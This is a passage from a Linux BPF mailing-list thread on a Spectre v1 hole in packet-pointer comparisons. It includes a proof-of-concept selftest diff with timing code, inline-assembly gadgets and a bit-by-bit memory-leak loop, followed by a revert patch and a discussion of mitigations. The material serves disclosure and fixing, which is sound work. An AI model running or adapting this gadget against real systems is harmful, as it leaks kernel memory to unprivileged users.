 .../testing/selftests/bpf/prog_tests/tc_bpf.c | 334 +++++++++++++++++-
 .../testing/selftests/bpf/progs/test_tc_bpf.c |  78 +++-
 .../selftests/bpf/progs/test_tc_bpf_pkt_ptr.h | 172 +++++++++
 .../bpf/progs/test_tc_bpf_pkt_ptr_byte.h      |  31 ++
 5 files changed, 625 insertions(+), 12 deletions(-)
 mode change 100644 => 100755 tools/testing/selftests/bpf/prog_tests/tc_bpf.c
 mode change 100644 => 100755 tools/testing/selftests/bpf/progs/test_tc_bpf.c
 create mode 100644 tools/testing/selftests/bpf/progs/test_tc_bpf_pkt_ptr.h
 create mode 100644 tools/testing/selftests/bpf/progs/test_tc_bpf_pkt_ptr_byte.h
diff --git a/net/sched/cls_bpf.c b/net/sched/cls_bpf.c index 382c7a71f81f..ef36ebca3b11 100644 --- a/net/sched/cls_bpf.c +++ b/net/sched/cls_bpf.c @@ -99,6 +99,28 @@ TC_INDIRECT_SCOPE int cls_bpf_classify(struct sk_buff *skb, __skb_push(skb, skb->mac_len); bpf_compute_data_pointers(skb); filter_res = bpf_prog_run(prog->filter, skb); + +#if 0 + // Print after program to not mess with the cache. + static atomic_t init = ATOMIC_INIT(0); + if (unlikely(skb_headlen(skb) == 170 && atomic_inc_return(&init) == 1)) { + barrier_nospec(); + struct bpf_skb_data_end *cb = (struct bpf_skb_data_end *)skb->cb; + pr_err_ratelimited( + "skb = %px, skb_headlen(skb) = %d\n" + "data *(%px) = %px\n" + "data_end *(%px) = %px\n" + "kernel skb_shinfo(skb)->frags[0].bv_page\n\t*(%px ?= data+366 = %px) = %px\n", + skb, skb_headlen(skb), + &(skb->data), skb->data, + &(cb->data_end), cb->data_end, + &skb_shinfo(skb)->frags[0].bv_page, + ((char *) skb->data) + 366, + skb_shinfo(skb)->frags[0].bv_page + ); + } +#endif + __skb_pull(skb, skb->mac_len); } else { bpf_compute_data_pointers(skb); diff --git a/tools/testing/selftests/bpf/prog_tests/tc_bpf.c b/tools/testing/selftests/bpf/prog_tests/tc_bpf.c old mode 100644 new mode 100755 index 48b55539331e..ec82e95895b5 --- a/tools/testing/selftests/bpf/prog_tests/tc_bpf.c +++ b/tools/testing/selftests/bpf/prog_tests/tc_bpf.c @@ -2,6 +2,8 @@
#include <test_progs.h> #include <linux/pkt_cls.h> +#include <arpa/inet.h> +#include <sys/socket.h>
#include "cap_helpers.h" #include "test_tc_bpf.skel.h" @@ -395,6 +397,251 @@ void tc_bpf_root(void) test_tc_bpf__destroy(skel); }
+static void die(char *s) +{ + perror(s); + exit(1); +} + +#define SERVER "127.0.0.1" +#define BUFLEN (128 * 1024) +#define PORT 8888 + +static int client(struct sockaddr_in *si_other) { + static int s = -1; + if ((s = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) == -1) { + die("socket"); + } + + memset((char *) si_other, 0, sizeof(si_other)); + si_other->sin_family = AF_INET; + si_other->sin_port = htons(PORT); + + if (inet_aton(SERVER , &si_other->sin_addr) == 0) { + fprintf(stderr, "inet_aton() failed\n"); + exit(1); + } + + return s; +} + +static int server(void) { + struct sockaddr_in si_me; + int s; + + if ((s = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP)) == -1) { + die("socket"); + } + + memset((char *) &si_me, 0, sizeof(si_me)); + + si_me.sin_family = AF_INET; + si_me.sin_port = htons(PORT); + si_me.sin_addr.s_addr = htonl(INADDR_ANY); + + if (bind(s, (struct sockaddr *) &si_me, sizeof(si_me)) == -1) { + die("bind"); + } + + return s; +} + +static int client_ping(int s, struct sockaddr_in *si_other, size_t n) { + unsigned int slen = sizeof(*si_other); + static char message[BUFLEN] = {}; + memset(message, 0x37, n); + + if (sendto(s, message, n, 0, (struct sockaddr *) si_other, slen) == -1) { + die("sendto()"); + } + + return 0; +} + +#define CAT(a, b, d, c) a ## b ## d ## c +#define NAME(S1, S2) CAT(pkt_ptr_, S1, _, S2) + +#define EI_MASK(BYTE, MASK) \ + else if (offset == BYTE && mask == MASK) fd = bpf_program__fd(skel->progs.NAME(BYTE, MASK)); + +#define EI_BYTE(BYTE) \ + EI_MASK(BYTE, 1) \ + EI_MASK(BYTE, 2) \ + EI_MASK(BYTE, 4) \ + EI_MASK(BYTE, 8) \ + EI_MASK(BYTE, 16) \ + EI_MASK(BYTE, 32) \ + EI_MASK(BYTE, 64) \ + EI_MASK(BYTE, 128) + +static int exploit(struct test_tc_bpf *skel, long long *skipped, long long *total, + long long *t0, long long *t1, int offset, int mask) { + DECLARE_LIBBPF_OPTS(bpf_tc_hook, hook, .ifindex = LO_IFINDEX, .attach_point = BPF_TC_INGRESS); + + int fd; + if (offset == 350 && mask == 1) fd = bpf_program__fd(skel->progs.pkt_ptr_350_1); + EI_BYTE(366) + EI_BYTE(367) + EI_BYTE(368) + EI_BYTE(369) + EI_BYTE(370) + EI_BYTE(371) + EI_BYTE(372) + EI_BYTE(373) + else { + errno = EINVAL; + die("mask/offset"); + } + + DECLARE_LIBBPF_OPTS(bpf_tc_opts, opts, .prog_fd = fd); + int ret; + + ret = bpf_tc_hook_create(&hook); + ret = ret == -EEXIST ? 0 : ret; + if (ret) { + errno = -ret; + perror("hook create"); + if (!ASSERT_OK(ret, "bpf_tc_hook_create(BPF_TC_INGRESS)")) + goto destroy; + } + + ret = bpf_tc_attach(&hook, &opts); + if (ret) + if (!ASSERT_OK(ret, "bpf_tc_attach")) + goto end; + + int ss = server(); + struct sockaddr_in si_server; + int cs = client(&si_server); + + client_ping(cs, &si_server, 16*1024); // make it set bv_page != 0 + +#define LEAKMAP_ENTRIES (5 * 512) + + for (__u32 i = 0; i < LEAKMAP_ENTRIES; i += 512) { + __u32 key = i; + __s64 value = -i; + ret = bpf_map__update_elem(skel->maps.leakmap, + &key, sizeof(key), + &value, sizeof(value), 0); + if (ret) { + if (!ASSERT_OK(ret, "init_leak")) + goto end; + } + } + +// for 128KiB L1d, 90MiB L3, 1536-entry sltlb +#define EVICTMAP_ENTRIES (8 * 128 * 1024) + for (__u32 i = 0; i < EVICTMAP_ENTRIES; i += 8) { + __u32 index = i / 8; + __u32 key = i + (index % 8); + __u64 value = i; + ret = bpf_map__update_elem(skel->maps.evictmap, &key, sizeof(key), &value, sizeof(value), 0); + if (ret) { + if (!ASSERT_OK(ret, "init_evict")) + goto end; + } + } + + long long n = 0; +#define T 8 +#define N 8 + long long i; + for (i = 0; n < N; i++) { + // Branch prediction using PHT will be wrong unless it knows rand(). 
+ int t = rand() % T; + for (int j = 0; j < t; j++) { + client_ping(cs, &si_server, 512); + } + client_ping(cs, &si_server, 128); // + 42 byte header + +#define X 4 + __s64 delta[X]; + for (size_t j = 0; j < X; j++) { + __u32 key[X] = {0, 512, 1536, 1024}; + ret = bpf_map__lookup_elem(skel->maps.leakmap, &key[j], sizeof(key[j]), + &delta[j], sizeof(delta[j]), 0); + if (ret) { + if (!ASSERT_OK(ret, "delta lookup")) + goto end; + } + if (delta[j] <= 0) { + ASSERT_OK(-1, "delta not written by bpf program"); + } + } + + __u32 key = 2048; + __u64 err; + ret = bpf_map__lookup_elem(skel->maps.leakmap, &key, sizeof(key), &err, sizeof(err), 0); + if (ret) { + if (!ASSERT_OK(ret, "err lookup")) + goto end; + } + static bool first = true; + if (err && first) { + first = false; + ASSERT_OK(-err, "bpf"); + } + + if (i == 2 * 2 * N) { + // reload and retry + ret = -1; + // fprintf(stderr, "i: timeout after %lld reps\n", i); + break; + } + + // sometimes everything is still in the cache + if (!((delta[3] < delta[2]))) { + // fprintf(stderr, "skip: uncached\t%lld, cached\t%lld, 0\t%lld, 1\t%lld\n", delta[2], delta[3], delta[0], delta[1]); + continue; + } + + if (delta[0] > delta[1]) + *t0 += 1000; + else + *t1 += 1000; + n++; + } + + *skipped += i-n; + *total += i; + + if (n > 0) { + *t0 /= n; + *t1 /= n; + } + + __u32 key = 0; + __u64 value; + int ret2 = bpf_map__lookup_elem(skel->maps.evictmap, + &key, sizeof(key), + &value, sizeof(value), 0); + if (ret2) { + if (!ASSERT_OK(ret2, "lookup")) + goto end; + } + if (value > i*T) { + ASSERT_OK(-1, "BUG value > i*T"); + goto end; + } + +end: + close(ss); + close(cs); + + opts.prog_fd = opts.prog_id = 0; + ret2 = bpf_tc_detach(&hook, &opts); + if (ret2) + ASSERT_OK(ret2, "bpf_tc_detach"); + +destroy: + ret2 = bpf_tc_hook_destroy(&hook); + if (ret2) + ASSERT_OK(ret2, "bpf_tc_hook_destroy"); + + return ret; +} + void tc_bpf_non_root(void) { struct test_tc_bpf *skel = NULL; @@ -409,11 +656,90 @@ void tc_bpf_non_root(void) if (!ASSERT_OK(ret, "disable_cap_sys_admin")) goto restore_cap;
- skel = test_tc_bpf__open_and_load(); - if (!ASSERT_OK_PTR(skel, "test_tc_bpf__open_and_load")) - goto restore_cap; + libbpf_set_print(NULL); + +#define O 1 + for (int k = 0; k < O; k++) {// to test reproducibility + + // Must match generated pkt_ptr programs in test_tc_bpf.c and exploit() + // function. + __u64 base_byte = 366; + + long long skipped = 0; + long long total = 0; + long long bad_loads = 0; + long long total_loads = 0; + __u64 qw = 0; + + for (__u64 byte = 0; byte < 8; byte++) { + for (__u64 bit = 0; bit < 8; bit++) { + + long long dmax = INT_MIN; + long long dmin = INT_MAX; + long long d = 0; + long long m = 0; +#define M 8 + int j = 0; + for (j = 0; true; j++) { + total_loads += 1; + skel = test_tc_bpf__open_and_load(); + if (skel) { + long long t0 = 0, t1 = 0; + + ret = exploit(skel, + &skipped, &total, + &t0, &t1, + base_byte + byte, 1 << bit); + if (ret == -1) { + bad_loads += 1; + goto cleanup; + } + if (ret) + if (!ASSERT_OK(ret, "exploit")) + goto restore_cap; + + if (j == 0) { + goto cleanup; + } + + long long jd = t0 - t1; + dmax = jd > dmax ? jd : dmax; + dmin = jd < dmin ? jd : dmin; + d += jd; + m++; + } + cleanup: + test_tc_bpf__destroy(skel); + + if (j == 64 * M) { + fprintf(stderr, "failed to read bit accurately because of too many consecutive bad loads or inconclusive result, will continue anyway"); + break; + } + + // Continue as long as result is inconclusive. + if (m >= M && (d / m >= 200 || d / m <= -200)) { + break; + } + } + + d /= m; + + fprintf(stderr, "*(data+%lld):%lld = %lld < avg %lld < %lld (ps), j = %d\n", base_byte + byte, bit, dmin, d, dmax, j); + + // little endian + __u64 b = !!(d < 0 ? 0 : 1); + qw |= b << ((byte * 8) + bit); + } + } + fprintf(stderr, "userspace guess for *(u64 *)(data+%lld = data_end+%lld) = 0x%llx\n" + "\t>%lld percent bad samples; %lld percent bad loads\n", + base_byte, base_byte - 42 - 128, qw, + (skipped * 100) / total, + (bad_loads * 100) / total_loads);
- test_tc_bpf__destroy(skel); + } + + ASSERT_OK(-1, "exploit");
restore_cap: if (caps) diff --git a/tools/testing/selftests/bpf/progs/test_tc_bpf.c b/tools/testing/selftests/bpf/progs/test_tc_bpf.c old mode 100644 new mode 100755 index ef7da419632a..c5344255ce88 --- a/tools/testing/selftests/bpf/progs/test_tc_bpf.c +++ b/tools/testing/selftests/bpf/progs/test_tc_bpf.c @@ -4,6 +4,7 @@ #include <bpf/bpf_helpers.h> #include <linux/if_ether.h> #include <linux/ip.h> +#include "bpf_misc.h"
/* Dummy prog to test TC-BPF API */
@@ -13,13 +14,74 @@ int cls(struct __sk_buff *skb) return 0; }
-/* Prog to verify tc-bpf without cap_sys_admin and cap_perfmon */ -SEC("tcx/ingress") -int pkt_ptr(struct __sk_buff *skb) -{ - struct iphdr *iph = (void *)(long)skb->data + sizeof(struct ethhdr); +/* pkt-ptr-based Spectre v1 gadget */
- if ((long)(iph + 1) > (long)skb->data_end) - return 1; - return 0; +#define LEAKMAP_ENTRIES (5 * 512) + +struct { + __uint(type, BPF_MAP_TYPE_ARRAY); + __uint(max_entries, LEAKMAP_ENTRIES); + __type(key, __u32); + __type(value, __u64); +} leakmap SEC(".maps"); + +#define L1_SIZE_KiB 128 +#define SIZEOF_CACHELINE 64 +#define EVICTMAP_ENTRIES (8 * 128 * 1024) + +struct { + __uint(type, BPF_MAP_TYPE_ARRAY); + __uint(max_entries, EVICTMAP_ENTRIES); + __type(key, __u32); + __type(value, __u64); +} evictmap SEC(".maps"); + +static long callback_fn(__u32 index, void *ctx) { +// sizeof(u64) * 8 is one 64-byte cacheline + __u32 key = index * 8 + (index % 8); + __u64 *value = bpf_map_lookup_elem(&evictmap, &key); + if (value) { + *value += 1; + return 0; + } + return 1; } + +#define STRINGIFY(x) #x +#define TOSTRING(x) STRINGIFY(x) +#define CAT(a, b, d, c) a ## b ## d ## c +#define NAME(S1, S2) CAT(pkt_ptr_, S1, _, S2) + +#define OFFSET 350 +#define MASK 1 +#include "test_tc_bpf_pkt_ptr.h" +#undef OFFSET +#undef MASK + +// 366 = PAYLOAD + 42 + 196 with PAYLOAD=128 +#define OFFSET 366 +#include "test_tc_bpf_pkt_ptr_byte.h" +#undef OFFSET +#define OFFSET 367 +#include "test_tc_bpf_pkt_ptr_byte.h" +#undef OFFSET +#define OFFSET 368 +#include "test_tc_bpf_pkt_ptr_byte.h" +#undef OFFSET +#define OFFSET 369 +#include "test_tc_bpf_pkt_ptr_byte.h" +#undef OFFSET +#define OFFSET 370 +#include "test_tc_bpf_pkt_ptr_byte.h" +#undef OFFSET +#define OFFSET 371 +#include "test_tc_bpf_pkt_ptr_byte.h" +#undef OFFSET +#define OFFSET 372 +#include "test_tc_bpf_pkt_ptr_byte.h" +#undef OFFSET +#define OFFSET 373 +#include "test_tc_bpf_pkt_ptr_byte.h" +#undef OFFSET + +char LICENSE[] SEC("license") = "GPL"; diff --git a/tools/testing/selftests/bpf/progs/test_tc_bpf_pkt_ptr.h b/tools/testing/selftests/bpf/progs/test_tc_bpf_pkt_ptr.h new file mode 100644 index 000000000000..2cd6ab000e4d --- /dev/null +++ b/tools/testing/selftests/bpf/progs/test_tc_bpf_pkt_ptr.h @@ -0,0 +1,172 @@ +#include <linux/bpf.h> +#include <bpf/bpf_helpers.h> +#include <linux/if_ether.h> +#include <linux/ip.h> +#include "bpf_misc.h" + +/* +cd /root/bpf && ./ltb/sbin/bpftool prog loadall ./test_tc_bpf.bpf.o /sys/fs/bpf/tc && ./ltb/sbin/bpftool prog dump jited pinned /sys/fs/bpf/tc/pkt_ptr + +*/ + +#undef SHIFT +#if MASK == 1 +#define SHIFT 9 +#endif +#if MASK == 2 +#define SHIFT 8 +#endif +#if MASK == 4 +#define SHIFT 7 +#endif +#if MASK == 8 +#define SHIFT 6 +#endif +#if MASK == 16 +#define SHIFT 5 +#endif +#if MASK == 32 +#define SHIFT 4 +#endif +#if MASK == 64 +#define SHIFT 3 +#endif +#if MASK == 128 +#define SHIFT 2 +#endif + +SEC("tcx/ingress") +__naked +void NAME(OFFSET, MASK)(void) +{ + // +76: data + // +80: data_end + asm volatile ( + "r7 = r1;" + + // Prepare data in callee-saved register that is not used by bpf_loop + // and callback_fn (and therefore not saved/restored). + "r9 = *(u32 *)(r7 + 76);" + "r8 = r9;" + // Construct bad ptr + "r9 += " TOSTRING(OFFSET) ";" + + // Prepare warm up gadget + "r8 += 166;" // 128 payload + 42 header - 4 + "r0 = *(u32 *)(r7 + 80);" // data_end + "if r0 <= r8 goto err_%=;" + + // Iterate over 8MiB to evict data_end cacheline from 1536-entry STLB + // and core's 2.5MiB L3. 
+ "r1 = 1024;" // *= 8 in callback + "r1 *= 128;" + "r2 = %[callback_fn] ll;" + "r3 = 0;" + "*(u64 *)(r10 - 8) = r3;" + "r3 = r10;" + "r3 += -8;" + "r4 = 0;" + "call %[bpf_loop];" + + // Warm secret TLB, improves accuracy + "r5 = *(u8 *)(r8 + 0);" + + "r8 = r9;" + // Wait for TLB to resolve page by storing to unitialized stack slot which will insert an lfence. + "*(u64 *)(r10 - 16) = r5;" + + // Check bpf_loop err + "if r0 == 0 goto err_%=;" + + // Prepare bpf_map_lookup_elem() args + "r1 = %[leakmap] ll;" + "r2 = r10;" + "r2 += -8;" + // Gadget + "r3 = *(u32 *)(r7 + 80);" // slow data_end load + "if r3 <= r8 goto check0_%=;" // mispredicted branch + // "r5 = 0x84;" // for testing gadget without load + "r5 = *(u8 *)(r9 + 0);" // fast secret load + "r5 &= " TOSTRING(MASK) ";" + "r5 <<= " TOSTRING(SHIFT) ";" + "*(u64*)(r10 - 8) = r5;" + "call %[bpf_map_lookup_elem];" + "if r0 == 0 goto err_%=;" + "r0 = *(u64 *)(r0 + 0);" // leak secret into leakmap[0|512].is_cached + + // Adds lfence, to make sure we don't speculate into the check code + "*(u64 *)(r10 - 24) = r0;" + + "check0_%=:" + +#undef TIME_R7 +#define TIME_R7() \ + "*(u64*)(r10 - 8) = r7;" \ + "call %[bpf_ktime_get_ns];" \ + "r6 = r0;" \ + "r1 = %[leakmap] ll;" \ + "r2 = r10;" \ + "r2 += -8;" \ + "call %[bpf_map_lookup_elem];" \ + "if r0 == 0 goto err_%=;" \ + "r1 = *(u64 *)(r0 + 0);" \ + "r7 = r0;" \ + "call %[bpf_ktime_get_ns];" \ + "r0 -= r6;" \ + "*(u64 *)(r7 + 0) = r0;" + + // warm instruction caches + "r7 = 1024;" + TIME_R7() + + // uncached access for comp. + "r7 = 1536;" + TIME_R7() + + // test 0 delay + "r7 = 0;" + TIME_R7() + + // test 1 delay + "r7 = 512;" + TIME_R7() + + // cached access for comp. + "r7 = 1024;" + TIME_R7() + + // set err=0 + "r1 = %[leakmap] ll;" + "r2 = 2048;" + "*(u64*)(r10 - 8) = r2;" + "r2 = r10;" + "r2 += -8;" + "call %[bpf_map_lookup_elem];" + "if r0 == 0 goto err_%=;" + "r1 = 0;" // err + "*(u64 *)(r0 + 0) = r1;" + + "goto exit_%=;" + + "err_%=:" + "r1 = %[leakmap] ll;" + "r2 = 2048;" + "*(u64*)(r10 - 8) = r2;" + "r2 = r10;" + "r2 += -8;" + "call %[bpf_map_lookup_elem];" + "if r0 == 0 goto exit_%=;" + "r1 = 2;" // err = other + "*(u64 *)(r0 + 0) = r1;" + + "exit_%=:" + "r0 = 2;" // TC_ACT_SHOT, drop packet + "exit;" + : + : __imm_addr(leakmap), + __imm_addr(callback_fn), + __imm(bpf_loop), + __imm(bpf_ktime_get_ns), + __imm(bpf_map_lookup_elem) + : __clobber_all); +} diff --git a/tools/testing/selftests/bpf/progs/test_tc_bpf_pkt_ptr_byte.h b/tools/testing/selftests/bpf/progs/test_tc_bpf_pkt_ptr_byte.h new file mode 100644 index 000000000000..b73ee23a59ec --- /dev/null +++ b/tools/testing/selftests/bpf/progs/test_tc_bpf_pkt_ptr_byte.h @@ -0,0 +1,31 @@ +#define MASK 1 +#include "test_tc_bpf_pkt_ptr.h" +#undef MASK + +#define MASK 2 +#include "test_tc_bpf_pkt_ptr.h" +#undef MASK + +#define MASK 4 +#include "test_tc_bpf_pkt_ptr.h" +#undef MASK + +#define MASK 8 +#include "test_tc_bpf_pkt_ptr.h" +#undef MASK + +#define MASK 16 +#include "test_tc_bpf_pkt_ptr.h" +#undef MASK + +#define MASK 32 +#include "test_tc_bpf_pkt_ptr.h" +#undef MASK + +#define MASK 64 +#include "test_tc_bpf_pkt_ptr.h" +#undef MASK + +#define MASK 128 +#include "test_tc_bpf_pkt_ptr.h" +#undef MASK
On Wed, Sep 13, 2023 at 8:30 PM Luis Gerhorst gerhorst@amazon.de wrote:
This reverts commit d75e30dddf73449bc2d10bb8e2f1a2c446bc67a2.
To mitigate Spectre v1, the verifier relies on static analysis to deduce constant pointer bounds, which can then be enforced by rewriting pointer arithmetic [1] or by index masking [2]. This relies on the fact that every memory region to be accessed has a static upper bound and that every byte below that bound is accessible. The verifier can only rewrite pointer arithmetic or insert masking instructions to mitigate Spectre v1 if such a static upper bound, below which every access is valid, can be given.

When allowing packet pointer comparisons, this introduces a way for the program to effectively construct an accessible pointer for which no static upper bound is known. Intuitively, this is obvious as a packet might be of any size, and therefore 0 is the only statically known upper bound below which every byte is always accessible (i.e., none is).

To clarify, the problem is not that comparing two pointers can be used for pointer leaks in the way that comparing a pointer to a known scalar can. That is because the "secret" components of the addresses cancel each other out if both pointers point into the same region.
With [3] applied, the following malicious BPF program can be loaded into the kernel without CAP_PERFMON:
r2 = *(u32 *)(r1 + 76)   // data
r3 = *(u32 *)(r1 + 80)   // data_end
r4 = r2
r4 += 1
if r4 > r3 goto exit
r5 = *(u8 *)(r2 + 0)     // speculatively read secret
r5 &= 1                  // choose bit to leak
// ... side channel to leak secret bit
exit:
// ...
This is jited to the following amd64 code which still contains the gadget:
 0: endbr64
 4: nopl 0x0(%rax,%rax,1)
 9: xchg %ax,%ax
 b: push %rbp
 c: mov %rsp,%rbp
 f: endbr64
13: push %rbx
14: mov 0xc8(%rdi),%rsi    // data
1b: mov 0x50(%rdi),%rdx    // data_end
1f: mov %rsi,%rcx
22: add $0x1,%rcx
26: cmp %rdx,%rcx
29: ja 0x000000000000003f  // branch to mispredict
2b: movzbq 0x0(%rsi),%r8   // speculative load of secret
30: and $0x1,%r8           // choose bit to leak
34: xor %ebx,%ebx
36: cmp %rbx,%r8
39: je 0x000000000000003f  // branch based on secret
3b: imul $0x61,%r8,%r8     // leak using port contention side channel
3f: xor %eax,%eax
41: pop %rbx
42: leaveq
43: retq
Here I'm using a port contention side channel because storing the secret to the stack causes the verifier to insert an lfence for unrelated reasons (SSB mitigation) which would terminate the speculation.
As Daniel already pointed out to me, data_end is even attacker-controlled, as one could send many packets of sufficient length to train the branch prediction into assuming that data + X > data_end will never be true. When the attacker then sends a packet with insufficient data, the Spectre v1 gadget leaks the chosen bit of some value that lies behind data_end.
To make it clear that the problem is not the pointer comparison but the missing masking instruction, it can be useful to transform the code above into the following equivalent pseudocode:
r2 = data
r3 = data_end
r6 = ...                 // index to access, constant does not help
r7 = data_end - data     // only known at runtime, could be [0,PKT_MAX)
if !(r6 < r7) goto exit  // no masking of index in r6 happens
r2 += r6                 // addr. to access
r5 = *(u8 *)(r2 + 0)     // speculatively read secret
// ... leak secret as above
One idea to resolve this while still allowing for unprivileged packet access would be to always allocate a power-of-2 size for the packet data and to also pass the respective index mask in the skb structure. The verifier would then have to check that this index mask is always applied to the offset before a packet pointer is dereferenced. This patch does not implement this extension, but only reverts [3].
Hi Luis,
The skb pointer comparison is a reasonable operation in a networking bpf prog. If we just prohibit a reasonable operation to prevent a possible spectre v1 attack, it looks a little weird, right ? Should we figure out a real fix to prevent it ?
On 15/09/2023 04:26, Yafang Shao wrote:
On Wed, Sep 13, 2023 at 8:30 PM Luis Gerhorst gerhorst@amazon.de wrote:
This reverts commit d75e30dddf73449bc2d10bb8e2f1a2c446bc67a2.
To mitigate Spectre v1, the verifier relies on static analysis to deduce constant pointer bounds, which can then be enforced by rewriting pointer arithmetic [1] or by index masking [2]. This relies on the fact that every memory region to be accessed has a static upper bound and that every byte below that bound is accessible. The verifier can only rewrite pointer arithmetic or insert masking instructions to mitigate Spectre v1 if such a static upper bound, below which every access is valid, can be given.

When allowing packet pointer comparisons, this introduces a way for the program to effectively construct an accessible pointer for which no static upper bound is known. Intuitively, this is obvious as a packet might be of any size, and therefore 0 is the only statically known upper bound below which every byte is always accessible (i.e., none is).

To clarify, the problem is not that comparing two pointers can be used for pointer leaks in the way that comparing a pointer to a known scalar can. That is because the "secret" components of the addresses cancel each other out if both pointers point into the same region.
With [3] applied, the following malicious BPF program can be loaded into the kernel without CAP_PERFMON:
r2 = *(u32 *)(r1 + 76)   // data
r3 = *(u32 *)(r1 + 80)   // data_end
r4 = r2
r4 += 1
if r4 > r3 goto exit
r5 = *(u8 *)(r2 + 0)     // speculatively read secret
r5 &= 1                  // choose bit to leak
// ... side channel to leak secret bit
exit:
// ...
This is jited to the following amd64 code which still contains the gadget:
 0: endbr64
 4: nopl 0x0(%rax,%rax,1)
 9: xchg %ax,%ax
 b: push %rbp
 c: mov %rsp,%rbp
 f: endbr64
13: push %rbx
14: mov 0xc8(%rdi),%rsi    // data
1b: mov 0x50(%rdi),%rdx    // data_end
1f: mov %rsi,%rcx
22: add $0x1,%rcx
26: cmp %rdx,%rcx
29: ja 0x000000000000003f  // branch to mispredict
2b: movzbq 0x0(%rsi),%r8   // speculative load of secret
30: and $0x1,%r8           // choose bit to leak
34: xor %ebx,%ebx
36: cmp %rbx,%r8
39: je 0x000000000000003f  // branch based on secret
3b: imul $0x61,%r8,%r8     // leak using port contention side channel
3f: xor %eax,%eax
41: pop %rbx
42: leaveq
43: retq
Here I'm using a port contention side channel because storing the secret to the stack causes the verifier to insert an lfence for unrelated reasons (SSB mitigation) which would terminate the speculation.
As Daniel already pointed out to me, data_end is even attacker-controlled, as one could send many packets of sufficient length to train the branch prediction into assuming that data + X > data_end will never be true. When the attacker then sends a packet with insufficient data, the Spectre v1 gadget leaks the chosen bit of some value that lies behind data_end.
To make it clear that the problem is not the pointer comparison but the missing masking instruction, it can be useful to transform the code above into the following equivalent pseudocode:
r2 = data
r3 = data_end
r6 = ...                 // index to access, constant does not help
r7 = data_end - data     // only known at runtime, could be [0,PKT_MAX)
if !(r6 < r7) goto exit  // no masking of index in r6 happens
r2 += r6                 // addr. to access
r5 = *(u8 *)(r2 + 0)     // speculatively read secret
// ... leak secret as above
One idea to resolve this while still allowing for unprivileged packet access would be to always allocate a power-of-2 size for the packet data and to also pass the respective index mask in the skb structure. The verifier would then have to check that this index mask is always applied to the offset before a packet pointer is dereferenced. This patch does not implement this extension, but only reverts [3].
Hi Luis,
The skb pointer comparison is a reasonable operation in a networking bpf prog. If we just prohibit a reasonable operation to prevent a possible spectre v1 attack, it looks a little weird, right ? Should we figure out a real fix to prevent it ?
I see your point, but this has been the case since Spectre v1 was mitigated for BPF. I actually did a few statistics on that in [1]: 50 out of ~350 programs are rejected because of the Spectre v1 mitigations. However, to repeat: the operation is not completely prohibited, only prohibited without CAP_PERFMON.
Maybe it would be possible to expose the allow_ptr_leaks/bpf_spec_vX flags in sysfs? It would be helpful for debugging, and you could set it to 1 permanently for your purposes. However, I'm not sure if the others would like that...
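Just to make that idea concrete, below is a minimal sketch of how such a knob could be wired up as a sysctl. Every name in it is hypothetical; it only illustrates the shape of a possible interface, not anything that exists today:

/* Hypothetical sketch: a global override for the BPF Spectre
 * mitigations, visible as /proc/sys/kernel/bpf_spec_mitigation_override.
 * Name and placement are made up for illustration; the verifier would
 * additionally have to consult this value when deciding whether to
 * bypass the Spectre v1/v4 mitigations.
 */
#include <linux/init.h>
#include <linux/sysctl.h>

static int sysctl_bpf_spec_mitigation_override;

static struct ctl_table bpf_spec_sysctls[] = {
	{
		.procname	= "bpf_spec_mitigation_override",
		.data		= &sysctl_bpf_spec_mitigation_override,
		.maxlen		= sizeof(int),
		.mode		= 0644,
		.proc_handler	= proc_dointvec_minmax,
		.extra1		= SYSCTL_ZERO,
		.extra2		= SYSCTL_ONE,
	},
	{ }
};

static int __init bpf_spec_sysctl_init(void)
{
	return register_sysctl("kernel", bpf_spec_sysctls) ? 0 : -ENOMEM;
}
late_initcall(bpf_spec_sysctl_init);

Whether something like this belongs under /proc/sys/kernel, somewhere else, or nowhere at all is exactly the part I am unsure the others would agree on.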
Another solution I have been working on in [2] is to change the mitigations to insert an lfence instead of rejecting the program entirely. That would cost performance, but would still be better than rejecting the program outright. However, these patches are currently far from going upstream.
A detail: the patches in [2] do not yet support the case we are discussing here; they only insert fences when the speculative paths fail to verify.
[1] https://sys.cs.fau.de/extern/person/gerhorst/23-03_fgbs-spring-2023-presenta... - Slide 9
[2] https://gitlab.cs.fau.de/un65esoq/linux/-/commits/v6.5-rc6-bpf-spectre-nospe...
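To sketch the general direction only (this is deliberately not the code from [2], and all names below are made up): BPF already has a BPF_NOSPEC instruction for the Spectre v4 mitigation, which for example the x86 JIT lowers to an lfence, so conceptually the verifier could record the offending instruction and patch a barrier in front of it instead of returning an error:

/* Conceptual sketch with hypothetical names, not the code from [2]:
 * where verification of an unprivileged program would currently fail
 * because a speculative access cannot be bounded, record the insn and
 * later prepend a BPF_NOSPEC barrier (lfence on x86) instead.
 */
#include <linux/types.h>

struct spec_fixup {
	int insn_idx;		/* instruction needing a barrier before it */
	bool nospec_before;	/* prepend BPF_NOSPEC instead of rejecting */
};

static int handle_unbounded_spec_access(struct spec_fixup *fix, int insn_idx,
					bool bypass_spec_v1)
{
	if (bypass_spec_v1)
		return 0;	/* privileged: no Spectre v1 mitigation needed */

	/* Instead of returning -EPERM as the verifier does today,
	 * remember that a speculation barrier must be patched in
	 * before this instruction.
	 */
	fix->insn_idx = insn_idx;
	fix->nospec_before = true;
	return 0;
}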
On Mon, Sep 18, 2023 at 7:52 PM Luis Gerhorst gerhorst@cs.fau.de wrote:
Maybe it would be possible to expose the allow_ptr_leaks/bpf_spec_vX flags in sysfs? It would be helpful for debugging, and you could set it to 1 permanently for your purposes. However, I'm not sure if the others would like that...
I really appreciate that idea. I actually shared a similar concept earlier [1]. Nonetheless, I believe it would be prudent to align the BPF subsystem with the system settings regarding CPU security mitigations as well. In our production environment, we consistently boot with "mitigations=off" [2] to enhance performance, essentially deactivating all optional CPU mitigations. Consequently, if a system-wide "mitigations=off" is set, it should also inherently bypass the Spectre v1 and Spectre v4 mitigations in the BPF subsystem.
Alexei, Daniel, any comments?
[1] https://lore.kernel.org/bpf/CALOAHbDDT=paFEdTb1Jsqu7eGkFXAh6A+f21VTrMdAeq5F6...
[2] https://www.kernel.org/doc/html/latest/admin-guide/kernel-parameters.html
-- Regards Yafang
On 9/19/23 5:43 AM, Yafang Shao wrote:
Alexei, Daniel, any comments?
Yes, I think that would be acceptable as a global override. At least I don't see how it would make anything worse if the rest of the system has its mitigations disabled anyway.
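For completeness, a sketch of what that global override could look like, assuming the bpf_bypass_spec_v1()/bpf_bypass_spec_v4() helpers and cpu_mitigations_off() keep their current form; this is untested and only illustrates the idea discussed above:

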